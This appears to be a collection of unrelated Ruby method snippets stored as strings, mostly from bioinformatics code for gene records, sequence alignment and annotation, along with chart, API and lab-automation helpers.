"def initialize(gnex, t, s, b, e, len, fr, ph, iac, dot, cr, prob, ts)\n @gene_number, @number = gnex.split(\".\").map {|n| n.to_i }\n @exon_type = t\n @strand = s\n @first = b.to_i\n @last = e.to_i\n @length = len.to_i\n @frame = fr\n @phase = ph\n @i_ac = iac.to_i\n @do_t = dot.to_i\n @score = cr.to_i\n @p_value = prob.to_f\n @t_score = ts.to_f\n end",
"def initialize (params = {})\n @gene_id = params.fetch(:gene_id, \"AT0G00000\")\n @gene_name = params.fetch(:gene_name, \"no_gene\")\n @mutant_phenotype = params.fetch(:mutant_phenotype, \"no_phenotype\")\n @linked = params.fetch(:linked, false) #This will change if the gene is linked\n#Default params, in case we don't introduce any or they aren't correct\n @@total_gene_objects[gene_id] = self #This way, we store the data to retrieve it later\n end",
"def initialize (params={})\n @name=params.fetch(:name, \"Unknown\")\n @atcode=params.fetch(:atcode, \"Unknown\")\n regexp_atcode = Regexp.new(/A[tT][1-5][gG](\\d{5})/) # This checks if Arabidopsis gene name has the correct\n # nomenclature. If the regular expression doesn't match the input name, it won't become that gene name.\n if regexp_atcode.match(@atcode).to_s != @atcode\n puts \"WARNING: input string doesn't match Arabidopsis thaliana gene pattern.\"\n @atcode=\"Unknown\"\n end\n @seedcode=params.fetch(:seedcode, \"Unknown\")\n end",
"def init\n if super\n @offset = 0\n @sg = ITALY\n self\n end\n end",
"def initialize (apgp, template = nil, options = {})\n raise ArgumentError, \"An anchored PGP needs to be passed\" if apgp.nil?\n\n options ||= {}\n @apgp = apgp\n @template = template || DEFAULT_TEMPLATE\n @ignore_predicates = options[:ignore_predicates] || []\n @sortal_predicates = options[:sortal_predicates] || SORTAL_PREDICATES\n max_hop = options[:max_hop] || 2\n\n @s_var = 0\n @p_var = 0\n @x_var = 0\n\n @bgps = gen_bgps(apgp, max_hop)\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def initialize_parameters\n @omdb_params = [:i, :t, :type, :y, :plot, :r, :tomates, :callback, :v, :s] \n end",
"def initialize\n \n # @gene = []\n # @@current_generation = 1\n \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align=(align)\n set_align(align)\n generate_buffers\n end",
"def initialize( config )\n @config = config\n\n self.top_align = self.top_font = self.right_align = self.right_font = 0\n\n init_with({\n :width => 500,\n :height => 300,\n :show_x_guidelines => false,\n :show_y_guidelines => true,\n :show_data_values => true,\n\n# :min_scale_value => 0,\n\n :show_x_labels => true,\n :stagger_x_labels => false,\n :rotate_x_labels => false,\n :step_x_labels => 1,\n :step_include_first_x_label => true,\n\n :show_y_labels => true,\n :rotate_y_labels => false,\n :stagger_y_labels => false,\n :scale_integers => false,\n\n :show_x_title => false,\n :x_title => 'X Field names',\n\n :show_y_title => false,\n :y_title_text_direction => :bt,\n :y_title => 'Y Scale',\n\n :show_graph_title => false,\n :graph_title => 'Graph Title',\n :show_graph_subtitle => false,\n :graph_subtitle => 'Graph Sub Title',\n :key => true, \n :key_position => :right, # bottom or right\n\n :font_size =>12,\n :title_font_size =>16,\n :subtitle_font_size =>14,\n :x_label_font_size =>12,\n :x_title_font_size =>14,\n :y_label_font_size =>12,\n :y_title_font_size =>14,\n :key_font_size =>10,\n \n :no_css =>false,\n :add_popups =>false,\n })\n\n\t\t\t\tset_defaults if respond_to? :set_defaults\n\n init_with config\n end",
"def process_annotation(params=nil)\n validate_params_solr_population(Sinatra::Helpers::SearchHelper::ALLOWED_INCLUDES_PARAMS)\n params ||= @params\n params_copy = params.dup\n\n text = params_copy.delete(\"text\")\n error 400, 'A text to be annotated must be supplied using the argument text=<text to be annotated>' if text.nil? || text.strip.empty?\n\n acronyms = restricted_ontologies_to_acronyms(params_copy)\n params_copy.delete(\"ontologies\")\n semantic_types = semantic_types_param(params_copy)\n params_copy.delete(\"semantic_types\")\n expand_class_hierarchy = params_copy.delete(\"expand_class_hierarchy\").eql?('true') # default = false\n class_hierarchy_max_level = params_copy.delete(\"class_hierarchy_max_level\").to_i # default = 0\n use_semantic_types_hierarchy = params_copy.delete(\"expand_semantic_types_hierarchy\").eql?('true') # default = false\n longest_only = params_copy.delete(\"longest_only\").eql?('true') # default = false\n expand_with_mappings = params_copy.delete(\"expand_mappings\").eql?('true') # default = false\n exclude_nums = params_copy.delete(\"exclude_numbers\").eql?('true') # default = false\n whole_word_only = params_copy.delete(\"whole_word_only\").eql?('false') ? false : true # default = true\n min_term_size = params_copy.delete(\"minimum_match_length\").to_i # default = 0\n exclude_synonyms = params_copy.delete(\"exclude_synonyms\").eql?('true') # default = false\n recognizer = (Annotator.settings.enable_recognizer_param && params_copy[\"recognizer\"]) || 'mgrep'\n params_copy.delete(\"recognizer\")\n\n annotator = nil\n\n # see if a name of the recognizer has been passed in, use default if not or error\n begin\n recognizer = recognizer.capitalize\n clazz = \"Annotator::Models::Recognizers::#{recognizer}\".split('::').inject(Object) {|o, c| o.const_get c}\n annotator = clazz.new\n rescue\n annotator = Annotator::Models::Recognizers::Mgrep.new\n end\n\n if params_copy[\"stop_words\"]\n annotator.stop_words = params_copy.delete(\"stop_words\")\n end\n\n params_copy.delete(\"display\")\n options = {\n ontologies: acronyms,\n semantic_types: semantic_types,\n use_semantic_types_hierarchy: use_semantic_types_hierarchy,\n filter_integers: exclude_nums,\n expand_class_hierarchy: expand_class_hierarchy,\n expand_hierarchy_levels: class_hierarchy_max_level,\n expand_with_mappings: expand_with_mappings,\n min_term_size: min_term_size,\n whole_word_only: whole_word_only,\n with_synonyms: !exclude_synonyms,\n longest_only: longest_only\n }\n options = params_copy.symbolize_keys().merge(options)\n\n begin\n annotations = annotator.annotate(text, options)\n\n unless includes_param.empty?\n # Move include param to special param so it only applies to classes\n params[\"include_for_class\"] = includes_param\n params.delete(\"display\")\n params.delete(\"include\")\n env[\"rack.request.query_hash\"] = params\n\n orig_classes = annotations.map {|a| [a.annotatedClass, a.hierarchy.map {|h| h.annotatedClass}, a.mappings.map {|m| m.annotatedClass}]}.flatten\n classes_hash = populate_classes_from_search(orig_classes, acronyms)\n annotations = replace_empty_classes(annotations, classes_hash) do |a|\n replace_empty_classes(a.hierarchy, classes_hash)\n replace_empty_classes(a.mappings, classes_hash)\n end\n end\n rescue LinkedData::Models::Ontology::ParsedSubmissionError => e\n error 404, e.message\n rescue Annotator::Models::NcboAnnotator::BadSemanticTypeError => e\n error 404, e.message\n end\n\n reply 200, annotations\n end",
"def initialize(params={})\n super\n\n @current_angle = 0\n additional_params = params.fetch(:additional_params, {})\n min_max = additional_params.fetch(:range, {:min => 30, :max => 150})\n @angle_range = Range.new(min_max[:min],min_max[:max])\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def initilize(end_type = :single, adaptor_seq = \"GATCGGAAGAG\")\n @end_type = end_type\n @adaptor_seq = adaptor_seq\n end",
"def ranno_params=(ann)\n @@current_args = ann\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def initialize (params = {}) # Get a value from the \"new\" call, or set a default\n # @id = \"Unknown_gene_id\", @prot=\"Unknown_protein_name\", @annot=\"Unknown_annotation\", @kegg_entryº=nil\n @id = params.fetch(:id, \"Unknown_gene_id\")\n @prot = params.fetch(:prot, \"Unknown_protein_name\")\n @annot = params.fetch(:annot, \"Unknown_annotation\")\n @kegg_entry = params.fetch(:kegg_entry, nil)\n end",
"def set_defaults\n super\n self.distance_from_intersection ||= 0\n self.lateral_offset ||= 0\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def initAnts(targetName, freq)\n $stderr.puts \"Initializing antennas for target=#{targetName}, freq=#{freq}\";\n puts \"Initializing antennas for target=#{targetName}, freq=#{freq}\";\n\n @targetName = targetName;\n\n puts getAntList(\",\");\n lna();\n pams($pamBand);\n focus(freq);\n setLO(\"b\", freq);\n setLO(\"c\", freq);\n createEphem(targetName);\n track(@targetName);\n autoatten();\n\n $stderr.puts \"Finished Initializing antennas for target=#{targetName}, freq=#{freq}\";\n puts \"Finished Initializing antennas for target=#{targetName}, freq=#{freq}\";\n end",
"def setup compat\n freq = compat ? 4 : 5\n #TODO define all the commands\n @sizes = { \n 2 => freq*2+1,\n 3 => freq,\n 4 => 2\n }\n #TODO compute OK/NG from a complete @sizes\n @okng = [5, 6]\n end",
"def initialize_attributes\n @marker_count = nil\n @maximum_value = @minimum_value = nil\n @labels = {}\n @sort = false\n @sorted_drawing = false\n @title = nil\n\n @title_font = Gruff::Font.new(size: 36.0, bold: true)\n @marker_font = Gruff::Font.new(size: 21.0)\n @legend_font = Gruff::Font.new(size: 20.0)\n\n @top_margin = @bottom_margin = @left_margin = @right_margin = DEFAULT_MARGIN\n @legend_margin = LEGEND_MARGIN\n @title_margin = TITLE_MARGIN\n\n @legend_box_size = 20.0\n\n @no_data_message = 'No Data'\n\n @hide_line_markers = @hide_legend = @hide_title = @hide_line_numbers = @legend_at_bottom = false\n @center_labels_over_point = true\n @has_left_labels = false\n @label_stagger_height = 0\n @label_max_size = 0\n @label_truncation_style = :absolute\n\n @x_axis_increment = nil\n @x_axis_label = @y_axis_label = nil\n @y_axis_increment = nil\n\n @x_axis_label_format = nil\n @y_axis_label_format = nil\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def initialize\n @class_name = default_class_name\n @rename_attrs = default_rename_attrs\n @exclude_attrs_on_create = default_exclude_attrs_on_create\n @exclude_attrs_on_update = default_exclude_attrs_on_update\n @associations = default_associations\n\n ScrapCbfRecord::Match.config = self\n\n super(*configs)\n end",
"def set_defaults\n self.bucket_agency_allocations = []\n end",
"def annotate\n genes={}\n File.open(ANNOTATION,'r').each do |line|\n temp=line.split\n genes[temp[9]]={}\n genes[temp[9]][\"start\"]=temp[3].to_i\n genes[temp[9]][\"end\"]=temp[4].to_i\n genes[temp[9]][\"strand\"]=temp[6]\n genes[temp[9]][\"length\"]=temp[4].to_i - 1 - temp[3].to_i\n end\n return genes\nend",
"def initialize (params = {})\n @gene_name = params.fetch(:gene_name,\"unknown\")\n @gene_phenotype = params.fetch(:gene_phenotype, \"unknown\") \n @gene_links = params.fetch(:gene_links, []) \n @gene_id = params.fetch(:gene_id,\"AT0G00000\") #gives default value\n\n end",
"def initialize(genome_fasta, hangover_length, options = {})\n starting_probe_number = options[:starting_probe_number]\n starting_probe_number ||= 1\n\n @filename = genome_fasta\n scaffolds = Bio::FinishM::ScaffoldBreaker.new.break_scaffolds(genome_fasta)\n @scaffolds = remove_overly_short_contigs!(scaffolds, hangover_length)\n\n # Remove scaffolds that have no good\n num_too_short_scaffolds = 0\n @scaffolds.reject! do |scaff|\n rej = scaff.contigs.empty?\n num_too_short_scaffolds += 1 if rej\n rej\n end\n if num_too_short_scaffolds > 0\n log.warn \"Removed #{num_too_short_scaffolds} scaffolds entirely as they were too short (or made up of all short contigs)\"\n end\n\n generate_numbered_probes(hangover_length, starting_probe_number)\n end",
"def initialize(randomness, ngram_size)\n @chains = []\n @input_set = []\n @randomness, @ngram_size = randomness, ngram_size\n end",
"def initializeDefaultParams()\n @fcName = nil # Flowcell name\n @baseCallsDir = nil # BaseCalls dir of the flowcell\n @useBasesMask = nil # Custom value to provide to BCL->FastQ convertor\n @sampleSheet = nil # Path to SampleSheet.csv\n\n yamlConfigFile = PathInfo::CONFIG_DIR + \"/config_params.yml\" \n @configReader = YAML.load_file(yamlConfigFile)\n @queue = SchedulerInfo::CASAVA_QUEUE # The processing queue on the cluster\n end",
"def annotation_params\n params.require(:annotation).permit(:audio_file_io, :start_second, :end_second, :notes)\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def annot_params\n params.fetch(:annot, {})\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def genome_annotation\n self.genome_assembly.present? ? self.genome_assembly.current_annotation : nil\n end",
"def option_align\n @align = true\n end",
"def antibiogram_params\n\t\t\tparams.fetch(:antibiogram, {})\n\t\tend",
"def initialize (num_legs) #You can put specific table material in initialize\n\t\t@tabletop = []\n\t\t@num_legs = num_legs\n\tend",
"def alignmentMarkerLoad(inhash)\n \n log_info 'inhash', inhash # 1, 0\n if inhash[:sampleTypes] == 'DNA'\n alignment_markers = find(:item, sample: { name: MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] })\n elsif inhash[:sampleTypes] == 'RNA'\n alignment_markers = find(:item, { sample: { name: MARKERS[inhash[:type_ind]] } } )\n end\n log_info 'alignment marker ', alignment_markers\n alignment_marker=-1\n if(!(alignment_markers.nil?))\n alignment_marker=alignment_markers[0] \n end\n log_info 'alignment_marker', alignment_marker\n # marker currently in machine (location)\n # marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n # .find { |s| s.datum[:matrix][0][0] == alignment_marker.sample.id && s.location == \"Fragment analyzer\"} # old version\n \n # TODO: use check_alignment_marker function\n marker_in_analyzer = find(:item, object_type: {name: \"Stripwell\"}).find {|s| s.location == 'Fragment analyzer'}\n \n # is requested marker different from marker in machine?\n different_marker =! (alignment_markers.include?(marker_in_analyzer))\n \n # old marker?\n old_marker=( (marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true) )\n \n # need to replace? \n marker_needs_replacing = (old_marker) || (different_marker)\n \n # new alignment marker\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n \n if(debug) \n show do\n title \"DEBUG\"\n note \"marker_in_analyzer=#{marker_in_analyzer}\"\n note \"different marker = #{different_marker}\"\n note \"marker_needs_replacing = #{marker_needs_replacing}\"\n note \"looking for #{MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]]}\"\n note \"alignment_marker_stripwell = #{alignment_marker_stripwell}\"\n end\n end\n\n # replace alignment marker\n if(marker_needs_replacing && alignment_marker_stripwell) \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the <b>Load Position</b> icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n if old_marker\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n end\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.save\n if(old_marker) # replaced because old one was outdated\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime \n alignment_marker_stripwell.save\n release [alignment_marker_stripwell] \n marker_in_analyzer.mark_as_deleted # trash outdated marker\n else # move current marker to SF2 (small fridge 2)\n marker_in_analyzer.location = \"SF2\"\n marker_in_analyzer.save\n end\n end\n end",
"def align(align=nil)\n @options[:align] = align unless align.nil?\n @options[:align]\n end",
"def initialize(line, qfasta_file, tfasta_file)\n a = line.split\n @qid = a[0]\n @qstart = a[1].to_i\n @qend = a[2].to_i\n @qstrand = a[3]\n @tid = a[4]\n @tstart = a[5].to_i\n @tend = a[6].to_i\n @tstrand = a[7]\n @score = a[8]\n @cigar = a[9..-1].each_slice(2).to_a.map{|a, b| [a, b.to_i]}\n\n @qfasta_file = qfasta_file\n @tfasta_file = tfasta_file\n end",
"def initialize\n @max_buckets = 8\n # TODO: some gradient descent to choose this number\n @min_support = 0.07\n @num_top_grams = 250\n end",
"def studentannotation_params\n params.require(:studentannotation).permit(:times, :comment, :statusannotation_id, :typeannotation_id, :user_id, :user_id)\n end",
"def init_params(learning_rate=0.1,f_regulator=0.015, f_amount=2, f_default=0.1,max_iterations=100)\r\n change_param(@learning_rate_str,learning_rate)\r\n change_param(@f_regulator_str,f_regulator)\r\n change_param(@f_amoun_str,f_amount)\r\n change_param(@f_default_str,f_default)\r\n change_param(@max_iterations_str,max_iterations)\r\n change_param(@global_predictor_str,0.0)\r\n set_factors_amount(f_amount)\r\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def before_perform\n \n @basename = File.join(job.job_dir, job.jobid)\n @seqfile = @basename+\".in\"\n params_to_file(@seqfile, 'sequence_input', 'sequence_file')\n @commands = []\n @informat = params['informat'] ? params['informat'] : 'fas'\n reformat(@informat, \"fas\", @seqfile)\n @informat = \"fas\"\n\n @maxpsiblastit = params['maxpsiblastit']\n @maxhhblitsit = params['maxhhblitsit']\n @ss_scoring = \"-ssm \" + params[\"ss_scoring\"]\n @ptot = \"-T \" + params[\"ptot\"]\n @pself = \"-P \" + params[\"pself\"]\n @mergerounds = \"-mrgr \" + params[\"mergerounds\"]\n @mact = \"-mapt1 \" + params[\"mact\"] + \" -mapt2 \" + params[\"mact\"] + \" -mapt3 \" + params[\"mact\"]\n @domm = params[\"domm\"].nil? ? \"-domm 0\" : \"\" \n \n @maxlines = \"20\"\n @v = 1\n \n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def annotate_samples\n # hash to connect metadata\n exp_hash = create_metadata_hash(@exp_metadata, 0) # { expid => [metadata] }\n bs_hash = create_metadata_hash(@bs_metadata, 0) # { biosampleid => [metadata] }\n srs_hash = create_metadata_hash(@bs_metadata, 1) # { sampleid => [metadata] }\n date_hash = received_date_by_experiment # { expid => date_received }\n\n annotated = Parallel.map(open(@samples_fpath).readlines.drop(1), :in_threads => @@nop) do |line|\n data = line.chomp.split(\"\\t\")\n sample_md = bs_hash[data[0]] || srs_hash[data[0]]\n sample_info = if sample_md\n coverage = if sample_md[3] != \"NA\"\n data[7].to_f / sample_md[3].to_f * 1_000_000\n else\n \"NA\"\n end\n [\n sample_md,\n coverage,\n ]\n else\n \"NA\\tNA\\tNA\\tNA\" # secondary sample id, taxon id, taxonomic name, coverage\n end\n [\n data,\n sample_info,\n exp_hash[data[1]],\n date_hash[data[1]],\n ].flatten.join(\"\\t\")\n end\n open(output_fpath(\"quanto.annotated.tsv\"), 'w'){|f| f.puts([annotated_header.join(\"\\t\"), annotated]) }\n end",
"def parse_alignment_options(options = {})\n return unless options[:alignment]\n\n CellAlignment.new options[:alignment]\n end",
"def initialize (gene_id, gene_name, mut_phen_description) #I initialize the three properties of the class\n @gene_id = gene_id\n @gene_name = gene_name\n @mut_phen_description = mut_phen_description\n @gene_linkings = [] # I prefer this attribute as array (one gene can be linked with more of one other gene)\n end",
